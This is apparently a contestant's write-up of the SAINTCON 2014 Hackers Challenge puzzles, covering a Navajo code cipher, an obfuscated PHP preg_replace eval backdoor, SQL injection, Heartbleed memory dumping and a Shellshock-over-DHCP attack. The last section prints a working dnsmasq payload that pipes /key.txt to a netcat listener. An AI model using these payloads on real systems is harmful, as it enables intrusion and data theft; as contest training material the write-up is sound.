You can find the SAINTCON 2014 Hackers Challenge Introduction here.
And this is all the files referenced below: SAINTCON_2014_Hackers_Challenge_PP.zip
The challenges referenced below can be found here:
Contents
PP100 – Talk the Talk, Walk the Walk
Puzzle:
Here is what you get: GLOE-IH DZEH AH-JAD TLA-GIN A-KHA TSIN-TLITI AH-NAH A-WOH NE-AHS-JAH KLESH WOL-LA-CHEE TKIN A-CHIN THAN-ZIE MOASI TLO-CHIN TSAH D-AH CHA DZEH JAD-HO-LONI AH-NAH TSAH-AS-ZIH TKIN DIBEH CHINDI TOISH-JEH NA-HASH-CHID
Solution:
Google for a word or two from the cypher text: DZEH or CHINDI
Aha! Navajo!
LEARN MORE at http://navajocodetalkers.org/
So drop it in a tool like this: http://cryptii.com/navajo/select
And get WELCOMETOSAINTCONTHEKEYISDBB
But DBB doesn’t work.
So LEARN MORE http://www.history.navy.mil/faqs/faq61-4.htm
D CHINDI DEVIL
B TOISH-JEH BARREL
B NA-HASH-CHID BADGER
Key: devilbarrelbadger
PP200 – Vuln Web App
Puzzle:
Start Here: http://54.172.118.66/hc.php Use the source Luke!
Solution:
Browse to the page and we see
What now? <!-- Not this source --> eJxdjM0KgkAYRfdB7/A1bQois3a2iEGFlmYStdGm8foD0cg0CkL07I1tgs7qLs65jUaZaTR3ITFjzrGNNvHqgXzigC0Y989ZKGRxicLGT17R6RxfgzRM1m/JUuYOcO7+wzm37e+Kzbfj0ZQOHgV1Tr1qqYLQJG6qNWQqkBQahnIYSFN32A0292gPKpU11FfSym5VEDro3iZPLOkD1DA4tQ==
So how do we get the PHP Source? Google some answers!
http://stackoverflow.com/a/1319647
So we try: http://54.172.118.66/hc.php
and get
<?php
# This source
if (strpos($_SERVER['REQUEST_URI'],'phps')){
show_source(__FILE__);
}
$b = base64_decode('cHJlZ19yZXBsYWNlKCIvU3VQM1IwbmVkIS9lIiwiQUNYX0VhY2ZZUEVwQ1R8UFZYUmBEXkVUMn5jIl4iMTExMTFBQTExMTExMTExMTExMTExMTExQUFBIiwiU3VQM1IwbmVkISIpOw0KIyBROiBEaWQgeW91IGhlYXIgYWJvdXQgdGhlIGNhcmV0IGRldGVjdGl2ZT8NCiMgQTogSGUgZ290IHRvIHRoZSByb290IG9mIGV2ZXJ5IGNhc2UuIA==');
$b = base64_encode(gzcompress($b));
print "What now?\n";
print '<!-- Not this source --> ';
print $b;
If you base64 decode the $b string you get:
preg_replace("/SuP3R0ned!/e","ACX_EacfYPEpCT|PVXR`D^ET2~c"^"11111AA11111111111111111AAA","SuP3R0ned!");
# Q: Did you hear about the caret detective?
# A: He got to the root of every case. What now?
The key here is that the ‘e’ on the end of the preg replace turns it into an eval. Which makes it easy to run if desired.
LEARN MORE at http://mrbluecoat.blogspot.com/2012/03/evolution-of-php-backdoor-evasion.html
But if done the hard way the string in the middle is a bitwise XOR operated with the Caret that equates:
print "WhatAreMagicQuotes?";
Key: WhatAreMagicQuotes
PP300 – SQLBooster
Puzzle:
Initial Clue: Search for a member of the Committee "Troy Jessup" Included Files: None This challenge begins at: http://sqlbooster.bruti.us/inject-a-thon
Solution:
This was solvable using very simple SQL injection.
Key:
PP400 –
Puzzle:
https://ssl.l34n.ninja Hints: Troy suggests a browser add-on that helps with cookie inspection and modification.
Solution:
This was vulnerable to heartbleed.
Using a tool like:
https://github.com/robertdavidgraham/heartleech
I was able to find this string in about 22MB of dumped memory:
thismightdosomething=nE7zpjDPiVBL2V5mugddhg==
and this one:
Your Key Is: MySessionsAreBleeding
If you passed modified the request to have that variable and value, the returned page would have the Key.
Key: MySessionsAreBleeding
PP500 – HackMe
Puzzle:
Somewhere in the con is a Ubuntu 14.04 computer that is just dying to connect to the SSID: HackMe, with the WPA Password: saintcon2014. The key is located on that computer in /key.txt Good luck
Solution:
So once a PC connects to a network it requests an IP address via DHCP.
Linux DHCP is vulnerable to the shellshock bug.
http://llify.com/2014/10/10/reverse-shell-from-a-the-bash-shell-shock-exploit-with-a-dnsmasq-dhcp-sever/
I exploited it this way using dnsmasq:
dhcp-range=10.13.13.13,10.13.13.130,10m
dhcp-option-force=100,() { :; }; /bin/nc 10.13.13.1 1337 < /key.txt
And just had a running nc -l -p 1337
And I got the key.
Key: